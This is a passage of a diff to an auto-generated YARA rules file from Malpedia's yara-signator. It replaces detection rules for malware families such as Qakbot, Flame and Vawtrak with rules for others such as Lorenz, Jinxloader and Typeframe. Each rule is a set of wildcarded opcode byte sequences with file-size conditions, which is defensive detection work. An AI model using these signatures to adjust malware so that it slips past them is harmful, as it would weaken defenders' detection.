+		$sequence_1 = { 03d6 8bc1 8b75c8 03da c1c00d 8bd1 }
+		$sequence_2 = { 8b75d4 c1c90e 33c8 836dc001 894ddc 894dbc 8b4df8 }
+		$sequence_3 = { ffd7 50 ffd6 ff75d8 6a00 ffd7 50 }
+		$sequence_4 = { 894108 eb03 8b7df8 56 6a00 ff15???????? 8b35???????? }
+		$sequence_5 = { 33c8 8bc3 034dcc 33c6 2345e4 33c3 03c1 }
+		$sequence_6 = { f7d8 837b0400 5f 0f4dc6 5e 894304 5b }
+		$sequence_7 = { 894db8 0fb64a38 c1e108 0bc8 0fb6423a c1e108 0bc8 }
+		$sequence_8 = { 33c8 8b7de4 03ca 8b5df4 8b55dc 8bc6 }
+		$sequence_9 = { 33c2 8b55dc 8945e4 8d0413 c1c007 3345cc 03d0 }
 
 	condition:
-		7 of them and filesize < 729088
+		7 of them and filesize < 133120
 }
-rule MALPEDIA_Win_Vawtrak_Auto : FILE
+rule MALPEDIA_Win_Wmighost_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "ce9fb6b0-3a67-57cc-b4c0-309ef9ca9f22"
+		id = "55e49921-45ae-5b90-8672-392197d5c46d"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.vawtrak"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.vawtrak_auto.yar#L1-L207"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.wmighost"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.wmighost_auto.yar#L1-L122"
 		license_url = "N/A"
-		logic_hash = "0909b4692ca0a0193737f7d7a0d93f3e3c94141796cfc88c3ca14d523aa0a3d1"
+		logic_hash = "baccfa7c7ba02590525c187cca262206672accd6710804ff2657e35b11ab051c"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -113231,44 +113215,32 @@ rule MALPEDIA_Win_Vawtrak_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 6a01 ff35???????? 6a04 6a01 }
-		$sequence_1 = { 6a04 6a01 50 ff15???????? 85c0 }
-		$sequence_2 = { 6a00 6a00 e8???????? 50 ff15???????? }
-		$sequence_3 = { 85c0 7415 ff15???????? 50 ff15???????? 6aff }
-		$sequence_4 = { ba00ff0000 8bc1 23c2 3bc2 }
-		$sequence_5 = { 69d26d4ec641 81c239300000 2ac2 8801 }
-		$sequence_6 = { e8???????? eb09 a804 7405 e8???????? 803d????????00 }
-		$sequence_7 = { 6a08 68???????? 56 ffd7 85c0 }
-		$sequence_8 = { ff15???????? a3???????? 85c0 74e7 }
-		$sequence_9 = { 7528 68???????? ff15???????? 85c0 7504 33c0 }
-		$sequence_10 = { 59 57 8bf0 ff15???????? 8bc6 }
-		$sequence_11 = { e8???????? 33d2 b9ff3f0000 f7f1 }
-		$sequence_12 = { 8bc6 8703 3bc6 74f8 }
-		$sequence_13 = { 8d429f 3c0f 7705 80ea61 eb0a 8d42bf 3c0f }
-		$sequence_14 = { ff7510 ff750c ff7508 e8???????? 83c40c 8d45fc 50 }
-		$sequence_15 = { c1e910 e9???????? 8ac1 c1e904 c0e004 }
-		$sequence_16 = { 8ac8 240f 80e1f0 80c110 }
-		$sequence_17 = { 3c41 7c11 3c46 7f0d }
-		$sequence_18 = { 03ea 03ff 03db 4883fe1e }
-		$sequence_19 = { 4533c0 488bd6 488bcd 48897c2428 4889442420 ff15???????? }
-		$sequence_20 = { 400f95c7 4533c9 4533c0 ff15???????? }
-		$sequence_21 = { 488364242000 4c8d442430 4533c9 33d2 }
+		$sequence_0 = { 50 ff5238 8945fc 837dfc00 7d12 }
+		$sequence_1 = { 8b95f8feffff 52 ff15???????? 83c410 8b85f8feffff 50 }
+		$sequence_2 = { 8d95f0fcffff 52 ff15???????? 68e8030000 ff15???????? }
+		$sequence_3 = { c745fcffffffff 8d4de8 e8???????? e9???????? 51 8bcc 8965c4 }
+		$sequence_4 = { 8bc8 e8???????? 6aff 8d4de8 e8???????? }
+		$sequence_5 = { 50 64892500000000 83ec08 894dec c745fc00000000 8d4d08 e8???????? }
+		$sequence_6 = { ff15???????? e9???????? c745fcffffffff 8d4d84 e8???????? }
+		$sequence_7 = { 6a44 6a00 8d45b0 50 e8???????? }
+		$sequence_8 = { 894dfc 8b45fc 50 ff15???????? 8b45fc 8be5 5d }
+		$sequence_9 = { 6a00 6a00 ff15???????? 6a17 6a00 68???????? }
 
 	condition:
-		7 of them and filesize < 1027072
+		7 of them and filesize < 49152
 }
-rule MALPEDIA_Win_Harnig_Auto : FILE
+rule MALPEDIA_Win_Chrgetpdsi_Stealer_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "9abf1275-be08-57a2-b590-38e4b33996cd"
+		id = "d3ecdf63-3d7b-56f8-8ebb-39b6f5471caa"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.harnig"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.harnig_auto.yar#L1-L126"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.chrgetpdsi_stealer"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.chrgetpdsi_stealer_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "87f18fe78ccecf6b99a233ae62c504e49ba2ae60d8433aec1b3aa385be172cee"
+		logic_hash = "6bfcd142e96c03742e4fbcd1d45c8791f0f2de988eb9c6e51f8b962532c287a2"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -113282,32 +113254,32 @@ rule MALPEDIA_Win_Harnig_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { ebba be0cfb1473 56 6a03 e8???????? ff7508 }
-		$sequence_1 = { be0cfb1473 56 6a03 e8???????? ff7508 ffd0 56 }
-		$sequence_2 = { e8???????? 6a04 8d4df8 51 6a06 ff750c ffd0 }
-		$sequence_3 = { 6a06 56 68???????? e8???????? 56 8d85b8fdffff }
-		$sequence_4 = { ffd0 bb30ef0298 53 6a01 e8???????? 57 }
-		$sequence_5 = { 33ff 8945d0 68d34ee485 8d85b8fdffff 6a04 c745c03c000000 897dc8 }
-		$sequence_6 = { ffd7 6a06 56 68???????? e8???????? }
-		$sequence_7 = { e8???????? 56 8d85e0fdffff 50 ffd3 e8???????? }
-		$sequence_8 = { f3ab e8???????? 8d4df0 51 8d4dac 51 }
-		$sequence_9 = { 68d34ee485 8d85b8fdffff 6a04 c745c03c000000 897dc8 c745cc6c104000 }
+		$sequence_0 = { 488dbc2428010000 488d742408 660f1f840000000000 0f1f4000 48896c24f0 488d6c24f0 e8???????? }
+		$sequence_1 = { e8???????? 84c0 0f8489010000 488b4c2458 488d7101 488b7c2478 0f1f440000 }
+		$sequence_2 = { 48898c24b0000000 4889442468 48895c2460 488d3dd9b32500 be27000000 e8???????? 488b542468 }
+		$sequence_3 = { 89d8 e8???????? 4889442458 48895c2448 488d05e3a61c00 0f1f00 e8???????? }
+		$sequence_4 = { 90 90 488d05e41e4200 e8???????? 90 488b4c2420 488b542418 }
+		$sequence_5 = { b909000000 488bbc2408060000 488bb42410060000 4c8d0575882700 41b91a000000 e8???????? 0f1f4000 }
+		$sequence_6 = { 31c0 31c9 31d2 31db e9???????? 4889d9 4889c3 }
+		$sequence_7 = { 48c740100f000000 488d0dca832500 48894808 833d????????00 7509 488905???????? eb0c }
+		$sequence_8 = { 4c8b842410010000 0f1f4000 e9???????? 4c8b842410010000 4d85c0 7e24 498d48ff }
+		$sequence_9 = { 4c89442478 0f1f00 4883fa01 7546 488d0573ca1a00 bb01000000 4889d9 }
 
 	condition:
-		7 of them and filesize < 49152
+		7 of them and filesize < 10027008
 }
-rule MALPEDIA_Win_Kimjongrat_Auto : FILE
+rule MALPEDIA_Win_Sappycache_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "4b926698-de48-5e8a-8566-c17b49269158"
+		id = "7cc3c8f2-16b3-5753-b1dc-441bde2f37db"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.kimjongrat"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.kimjongrat_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.sappycache"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.sappycache_auto.yar#L1-L124"
 		license_url = "N/A"
-		logic_hash = "da574ab8eb91cef15d29c514535c9dc879faba86aa4b2abebc3c50264b62c499"
+		logic_hash = "69868e0b80392ecc35dcd562f65c813ca6117f731788d5ab611817e1e3bff002"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -113321,34 +113293,34 @@ rule MALPEDIA_Win_Kimjongrat_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { eb13 ff37 6a00 ff771c 52 ff7508 e8???????? }
-		$sequence_1 = { 85c9 740e 51 50 e8???????? 83c408 0bf8 }
-		$sequence_2 = { e9???????? c6840decfbffff64 e9???????? c6840decfbffff70 e9???????? c6840decfbffff73 e9???????? }
-		$sequence_3 = { c6840db0abffff29 e9???????? c6840db0abffff3b e9???????? c6840db0abffff2b e9???????? c6840db0abffff3e }
-		$sequence_4 = { 8b43e8 0343e4 8943cc e9???????? 8d4304 50 8d73d4 }
-		$sequence_5 = { 8bd7 85d2 7464 8b4d08 8b4908 8b491c 8b4910 }
-		$sequence_6 = { beff1f0000 6685700c 8b75c8 741c 6a00 52 57 }
-		$sequence_7 = { 8b5d08 807b4201 0f859d000000 8a5340 f6c202 0f8491000000 8b4b10 }
-		$sequence_8 = { e9???????? 6a01 ff73b4 57 e8???????? ff73c4 ff73f4 }
-		$sequence_9 = { e8???????? 8b5d10 53 6a00 6a4f ff75f8 8bf8 }
+		$sequence_0 = { ff15???????? 4c8bc3 33d2 488bc8 488907 488be8 e8???????? }
+		$sequence_1 = { 0f84a0000000 817c242000140000 0f8592000000 488d05b8600100 b928000000 }
+		$sequence_2 = { 4863c9 488d1556fa0000 488bc1 83e13f 48c1f806 }
+		$sequence_3 = { 4c8d442440 8bca 488d542448 48c1e109 4903cc e8???????? 488b5c2448 }
+		$sequence_4 = { 488bfb 48895c2420 8b05???????? 3bf0 7c3b 4c8d3db7fa0000 }
+		$sequence_5 = { 4889442478 488bd8 4885c0 0f840d060000 4889bc2488630000 }
+		$sequence_6 = { 488bcf ff15???????? b801000000 488b6c2440 488b742448 488b7c2450 488b4c2428 }
+		$sequence_7 = { ff15???????? 488d4540 498bd7 48ffc2 44382c10 }
+		$sequence_8 = { 488d15bdcbffff 488d0c10 813950450000 755f b80b020000 66394118 7554 }
+		$sequence_9 = { 4883ec68 488b05???????? 4833c4 4889442450 33ff 33db }
 
 	condition:
-		7 of them and filesize < 1572864
+		7 of them and filesize < 262144
 }
-rule MALPEDIA_Win_Qakbot_Auto : FILE
+rule MALPEDIA_Win_Jinxloader_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "e4d23f43-6680-5968-8ae5-2a0425f4dd3a"
+		id = "bf4fed28-9df0-5c07-919b-e147a3bf2a61"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.qakbot"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.qakbot_auto.yar#L1-L535"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.jinxloader"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.jinxloader_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "bc5a235576277933c27e5fa570e0287f83745ef4475cd2eb6f595916a62cbcba"
+		logic_hash = "a80dddab53cddfaf6005da20443003f999792e56e65e502c4cb3050695796046"
 		score = 75
-		quality = 50
+		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -113360,87 +113332,34 @@ rule MALPEDIA_Win_Qakbot_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 33c0 7402 ebfa e8???????? }
-		$sequence_1 = { 7402 ebfa 33c0 7402 }
-		$sequence_2 = { 7402 ebfa eb06 33c0 }
-		$sequence_3 = { 50 e8???????? 8b06 47 59 }
-		$sequence_4 = { 59 59 6afb e9???????? }
-		$sequence_5 = { 740d 8d45fc 6a00 50 }
-		$sequence_6 = { 48 50 8d8534f6ffff 6a00 50 e8???????? }
-		$sequence_7 = { 50 e8???????? 59 59 6afe 58 }
-		$sequence_8 = { 8945fc e8???????? 8bf0 8d45fc 50 e8???????? }
-		$sequence_9 = { 33c0 e9???????? 33c0 7402 }
-		$sequence_10 = { 7402 ebfa e9???????? 6a00 }
-		$sequence_11 = { eb0b c644301c00 ff465c 8b465c }
-		$sequence_12 = { 7cef eb10 c644301c00 ff465c }
-		$sequence_13 = { e8???????? 83c410 33c0 7402 }
-		$sequence_14 = { 5e c9 c3 55 8bec 81ecc4090000 }
-		$sequence_15 = { 85c0 750a 33c0 7402 }
-		$sequence_16 = { 7507 c7466401000000 83f840 7507 }
-		$sequence_17 = { 837dfc00 750b 33c0 7402 }
-		$sequence_18 = { e8???????? e8???????? 33c0 7402 }
-		$sequence_19 = { 833d????????00 7508 33c0 7402 }
-		$sequence_20 = { c7466001000000 33c0 40 5e }
-		$sequence_21 = { 7402 ebfa 837d1000 7408 }
-		$sequence_22 = { 80ea80 8855f0 e8???????? 0fb64df7 }
-		$sequence_23 = { 83f841 7c05 83f85a 7eeb 83f861 }
-		$sequence_24 = { 7eeb 83f861 7c05 83f87a }
-		$sequence_25 = { e8???????? 833822 7505 83c8ff }
-		$sequence_26 = { 6a00 50 e8???????? 6a00 57 e8???????? }
-		$sequence_27 = { b301 eb0c 813800300000 b302 7202 }
-		$sequence_28 = { 7418 813800200000 7304 b301 eb0c }
-		$sequence_29 = { c1e81e 33448afc 69c06589076c 03c1 89048a ff82c0090000 81bac009000070020000 }
-		$sequence_30 = { ff10 85c0 750b ff15???????? e9???????? }
-		$sequence_31 = { 50 8d45d8 50 8d45d4 50 8d45ec 50 }
-		$sequence_32 = { 7507 e8???????? 8bc8 890d???????? }
-		$sequence_33 = { 83f801 7513 85c9 7507 e8???????? }
-		$sequence_34 = { 6a00 6800600900 6a00 ff15???????? a3???????? }
-		$sequence_35 = { e8???????? 33c0 c3 55 8bec 51 51 }
-		$sequence_36 = { 50 ff5508 8bf0 59 }
-		$sequence_37 = { 6a00 58 0f95c0 40 50 }
-		$sequence_38 = { c3 33c9 3d80000000 0f94c1 }
-		$sequence_39 = { 750c 57 ff15???????? 6afe 58 }
-		$sequence_40 = { 57 ff15???????? 33c0 85f6 0f94c0 }
-		$sequence_41 = { 57 6a00 6a02 ff15???????? 8bf8 83c8ff 3bf8 }
-		$sequence_42 = { 50 e8???????? 6a40 8d4590 }
-		$sequence_43 = { 56 e8???????? 83c40c 8d4514 50 }
-		$sequence_44 = { c7871002000001000000 8bc3 eb02 33c0 }
-		$sequence_45 = { e8???????? e8???????? e8???????? e8???????? 85c0 7405 e8???????? }
-		$sequence_46 = { eb13 488bd3 488bce ff15???????? }
-		$sequence_47 = { eb05 be01000000 488b15???????? 488b4d48 ff5220 488b15???????? }
-		$sequence_48 = { f7d9 eb03 4d8bda 4d8bc3 33d2 498d7b01 }
-		$sequence_49 = { e8???????? 6a00 8d45d4 50 68???????? }
-		$sequence_50 = { 5d c3 33c9 66890c46 }
-		$sequence_51 = { 8974240c 8a742431 80c63d 28d6 8874240b 69f60ea9c735 89742404 }
-		$sequence_52 = { 69f63c13b648 01f2 89442428 8954242c }
-		$sequence_53 = { 8955cc 74bf e9???????? 55 89e5 83ec08 c745fca1552064 }
-		$sequence_54 = { 0f4cc8 8b442408 890424 894c2404 8b4c2444 ffd1 83ec08 }
-		$sequence_55 = { 8b84248c000000 35fc387373 8b4c2470 01c1 }
-		$sequence_56 = { 57 85c0 0f8445010000 8b3d???????? }
-		$sequence_57 = { 66660f1f840000000000 8b4c9604 330c96 81e1ffffff7f }
-		$sequence_58 = { 8b442438 8b4c243c 8b11 83fa00 8944241c 894c2420 }
-		$sequence_59 = { c785f8f9ffff00000000 6a00 56 8bf9 e8???????? }
-		$sequence_60 = { 8b742418 8b7c241c f7d7 f7d6 89742418 }
-		$sequence_61 = { 7536 56 50 ff35???????? ff15???????? 8b85c0faffff 85c0 }
-		$sequence_62 = { 880c1a 8a4df3 324df3 884df3 83c301 8b55ec 39d3 }
+		$sequence_0 = { c3 0f10442440 90 488b8c2488000000 0f1101 0f10442450 0f114110 }
+		$sequence_1 = { e8???????? 488b942498000000 498913 488910 48c7401802000000 4c8d0521e42000 4c894010 }
+		$sequence_2 = { e8???????? 488b9424c8020000 498913 488d5818 488bb080000000 49897308 488bb424c0020000 }
+		$sequence_3 = { eb21 488d7e58 90 eb1a 488d7e38 eb14 488d7e38 }
+		$sequence_4 = { c3 31c0 4889fb 4889f1 4881c408010000 5d c3 }
+		$sequence_5 = { b801000000 4881c430010000 5d c3 488b8424f0000000 4883c010 488b4c2450 }
+		$sequence_6 = { e8???????? 833d????????00 750a 488b8c2448170000 eb10 e8???????? 488b8c2448170000 }
+		$sequence_7 = { eb0d e8???????? 488b542440 498913 48895018 488d1d78464b00 4889c1 }
+		$sequence_8 = { f20f11442428 f20f104808 f20f114c2420 e8???????? 488b442458 488b5c2418 e8???????? }
+		$sequence_9 = { e8???????? 488d8424d0000000 488b9c2408020000 488b4c2458 488bbc2418020000 e8???????? 488d8424d0000000 }
 
 	condition:
-		7 of them and filesize < 4883456
+		7 of them and filesize < 20364288
 }
-rule MALPEDIA_Win_Ransoc_Auto : FILE
+rule MALPEDIA_Win_Lorenz_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "d4231c6d-a004-5baa-86ba-cc26d508cfdf"
+		id = "3aee8adc-1b9f-5b03-9288-bb1500e950aa"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ransoc"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.ransoc_auto.yar#L1-L120"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.lorenz"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.lorenz_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "3aba656893a98b7e7e042164f300a01531e4785d0c2a9f4ed3d68e27e1dc31f6"
-		score = 75
-		quality = 75
+		logic_hash = "c80c5566415183b7ec75889797e4ddd8ca135fa83bddd748f7ac34751f1b8d91"
+		score = 60
+		quality = 45
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -113452,32 +113371,32 @@ rule MALPEDIA_Win_Ransoc_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { c3 57 50 6a01 e8???????? }
-		$sequence_1 = { 8b5034 3bd7 753e 8b7230 }
-		$sequence_2 = { eb02 8913 894a34 895138 8b4834 8b503c }
-		$sequence_3 = { 0f8487000000 56 68???????? 45 e8???????? 83c408 }
-		$sequence_4 = { 394134 7506 8b5034 895134 394140 7506 8b5034 }
-		$sequence_5 = { 8b542428 5d 894808 5b }
-		$sequence_6 = { 89462c a820 7406 8b4604 014804 8b462c a900080000 }
-		$sequence_7 = { eb07 894a34 eb02 890b 894134 894838 8b13 }
-		$sequence_8 = { f7402c00000001 a1???????? 890c24 7505 }
-		$sequence_9 = { 83c618 56 e8???????? 83c40c 5e c3 }
+		$sequence_0 = { 8bec 51 894dfc 6a0c 8b4508 50 8b4dfc }
+		$sequence_1 = { 894db0 8b55b0 3b55f4 7314 8b45b0 8b4dfc 8b1481 }
+		$sequence_2 = { e8???????? 8945f8 8b55fc 833a02 753d 8b4df8 e8???????? }
+		$sequence_3 = { e8???????? 68???????? 8d4d84 51 e8???????? 8b5514 52 }
+		$sequence_4 = { 8b4dfc e8???????? 0fb6d0 85d2 7454 8b45fc 8b480c }
+		$sequence_5 = { ff15???????? 33d2 8b450c 66895004 8b4d0c 8b55f4 8911 }
+		$sequence_6 = { 8b55dc 8b02 50 8b4d08 51 8b4ddc e8???????? }
+		$sequence_7 = { 83c410 e9???????? 68???????? 8d4dbc e8???????? 8b4dec 8b11 }
+		$sequence_8 = { 6a00 68840a0000 68???????? 6a02 e8???????? 83c418 83f801 }
+		$sequence_9 = { cc 33d2 75c3 33c0 75bf 837dfc00 7408 }
 
 	condition:
-		7 of them and filesize < 958464
+		7 of them and filesize < 2254848
 }
-rule MALPEDIA_Win_Eddiestealer_Auto : FILE
+rule MALPEDIA_Win_Typeframe_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "e232a61b-2f1e-5ab2-a023-babaefc44f11"
+		id = "54b5c61d-baac-5ee7-bf22-feb7211e94de"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.eddiestealer"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.eddiestealer_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.typeframe"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.typeframe_auto.yar#L1-L148"
 		license_url = "N/A"
-		logic_hash = "755d9f27c3527a6497613857d1940285eade46fbad0b63ce47e48a5daf512e5a"
+		logic_hash = "80d5f324e45f06373a108fe4a18abca87604cdaaeb894c2ac4120a591e037164"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -113491,32 +113410,38 @@ rule MALPEDIA_Win_Eddiestealer_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 4c3ba42498000000 0f84da010000 498d7c2410 49897f40 488b842488000000 4c8b28 488b842490000000 }
-		$sequence_1 = { b808000000 488d0d6faf0500 48894d00 48895d08 48894510 0f117518 488dbc24500c0000 }
-		$sequence_2 = { 4d39d3 4c89d1 490f47cb 4584ff 490f45cb 4c0f45d7 4c8b5c2440 }
-		$sequence_3 = { 8b542430 e8???????? 0fb66802 440fb738 4181f7aafa0000 4080f544 b903000000 }
-		$sequence_4 = { e8???????? 660fefc0 488365f000 660f7f45d0 660f7f45e0 31c9 488d1578820600 }
-		$sequence_5 = { 7720 4c8b0411 4c330408 4c89440c30 4883c108 ebe7 488bb42400010000 }
-		$sequence_6 = { e8???????? 668932 4889842488000000 4889942490000000 48c784249800000002000000 c68424a000000005 0f108424b0020000 }
-		$sequence_7 = { e8???????? e8???????? 488b4808 48898c2448010000 488b4010 4889842438010000 488d055e330300 }
-		$sequence_8 = { c1e80c 31d0 89c2 c1ea10 31c2 69c2fad30000 0fb7c0 }
-		$sequence_9 = { 31d2 488d0d72810400 49b8001927cf2367fead 41f6c101 741c 440fb60c0a 4d09c1 }
+		$sequence_0 = { 004fb5 0500cccccc cc 48895c2410 }
+		$sequence_1 = { 002d???????? b505 00eb b405 }
+		$sequence_2 = { 004775 0300 3c75 0300 }
+		$sequence_3 = { 0026 b505 004fb5 0500cccccc }
+		$sequence_4 = { 006a0f 57 8bf0 e8???????? }
+		$sequence_5 = { 0004af 0300 f6ae0300e8ae 0300 }
+		$sequence_6 = { 01442468 8d4c0f78 83e978 8d44242c }
+		$sequence_7 = { 0056e5 0400 af e504 }
+		$sequence_8 = { 0102 0318 18040506071818 1818 }
+		$sequence_9 = { 008601010000 0fb69601010000 410fb60c30 0fb60432 }
+		$sequence_10 = { 0108 83c004 4a 75cd }
+		$sequence_11 = { 014424fc 83ec04 2bc1 58 0f83be000000 }
+		$sequence_12 = { 008501010000 410fb60c28 0fb69501010000 0fb6042a }
+		$sequence_13 = { 01442408 c74424fc00000000 014c24fc 83ec04 }
+		$sequence_14 = { 01442418 8d6c282c 83ed2c eb04 }
+		$sequence_15 = { 014424fc 83ec04 2bc2 58 720c }
 
 	condition:
-		7 of them and filesize < 1316864
+		7 of them and filesize < 2125824
 }
-rule MALPEDIA_Win_Flame_Auto : FILE
+rule MALPEDIA_Win_Bistromath_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "9866d719-20ba-56a9-89a4-346e1b2eca8d"
+		id = "3bccd3a0-c0bd-5aa2-bcab-9b1969a6c7fd"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.flame"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.flame_auto.yar#L1-L147"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bistromath"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.bistromath_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "131f2d5e5a8a0cf24fae537b61affbb5c92eae0dfe8bde03b44be173be5d9d24"
+		logic_hash = "6eb59622b909c4597fcaca67234110606cdc73af8fb69989e1a6ed85248b5331"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -113530,36 +113455,32 @@ rule MALPEDIA_Win_Flame_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 83f901 7415 e8???????? c70016000000 }
-		$sequence_1 = { 85c9 741a 83f901 7415 }
-		$sequence_2 = { 7573 895dec 8d45ec 50 }
-		$sequence_3 = { 7428 498b5610 8b4f18 8bc3 }
-		$sequence_4 = { 7428 448865dc 41c1ec08 488d55dc 448865dd 8b4f18 }
-		$sequence_5 = { 8d45dc 33f6 6a14 50 8975f4 8975fc }
-		$sequence_6 = { ffd7 90 eb00 4883c430 5f 5e }
-		$sequence_7 = { 7429 488b4c2428 488d542450 41b8df010000 }
-		$sequence_8 = { 8bce 89450c e8???????? 8b06 57 }
-		$sequence_9 = { 894e10 8d4df0 51 6a40 6a0f 50 }
-		$sequence_10 = { 74ac 68???????? ff35???????? e8???????? 59 59 a3???????? }
-		$sequence_11 = { 6a08 59 ff7510 33c0 ff750c 8d7de0 }
-		$sequence_12 = { 7428 41b918000000 4533c0 488bd0 }
-		$sequence_13 = { 8bbb98000000 440fb7c5 4923c7 488bce 4903c4 }
+		$sequence_0 = { ff701c e8???????? ff75f8 ba17000000 8945e4 6aff 8bce }
+		$sequence_1 = { e8???????? 83c408 85c0 7414 8b4d08 89482c 8b4c2434 }
+		$sequence_2 = { e8???????? 8bf0 85f6 7533 8b4b04 8d4308 50 }
+		$sequence_3 = { 8bf9 8d45fc 50 8bf2 8b0f e8???????? 83c408 }
+		$sequence_4 = { e8???????? 8bf8 85ff 7416 ff75fc ff75f4 57 }
+		$sequence_5 = { 8d850cffffff 6a00 50 e8???????? 83c40c 8d85fcfeffff 50 }
+		$sequence_6 = { ffb594f4ffff 8bd3 8d8db8f8ffff e8???????? 83c404 8d85b8f8ffff 50 }
+		$sequence_7 = { ffd0 83c404 83460cff 8b06 c7461400000000 8945fc 751e }
+		$sequence_8 = { e8???????? 84c0 7504 33f6 eb1e 6a40 e8???????? }
+		$sequence_9 = { 8d8504ffffff 50 57 ffd6 8985b8feffff 8d45e0 50 }
 
 	condition:
-		7 of them and filesize < 1676288
+		7 of them and filesize < 33816576
 }
-rule MALPEDIA_Win_Ranbyus_Auto : FILE
+rule MALPEDIA_Win_Splinter_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "54de3fda-fe2a-5da1-b66d-8d3ced40b618"
+		id = "d16ca329-56e4-510f-9e6c-3e0242a5a17c"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ranbyus"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.ranbyus_auto.yar#L1-L118"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.splinter"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.splinter_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "82fa28b1862a5e88eb758d7dfc3440cfe7dde7bd4fcf686642cc7b0948f4efb1"
